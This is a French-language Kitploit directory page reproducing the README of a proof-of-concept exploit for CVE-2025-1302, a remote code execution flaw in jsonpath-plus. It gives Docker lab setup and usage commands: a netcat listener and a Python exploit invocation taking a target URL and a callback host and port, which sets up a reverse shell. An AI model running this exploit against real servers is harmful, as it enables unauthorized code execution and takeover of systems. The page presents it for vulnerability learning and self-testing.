Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1302 — JSONPath-plus Remote Code Execution | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2025-1302
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Remote Code Execution

Voir le dépôt
201il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Configuration du laboratoire

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Description

Les versions du package jsonpath-plus antérieures à 10.3.0 sont vulnérables à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées. Un attaquant peut exécuter du code arbitraire sur le système en exploitant l'utilisation par défaut non sécurisée du mode eval='safe'. Remarque : Ceci est causé par un correctif incomplet pour CVE-2024-21534.

Comment utiliser

Clone Git

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Installer les paquets

root@kitploit:~
pip install -r requirements.txt

Commande

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Sortie

image

Résultat

image

Avertissement

Ce dépôt n'est pas destiné à être un exploit RCE pour CVE-2025-1302. Le but de ce projet est d'aider les personnes à apprendre cette vulnérabilité, et éventuellement tester leurs propres applications.

EQST Insight

Nous publions une analyse des CVE et des malwares une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do

Télécharger l’outil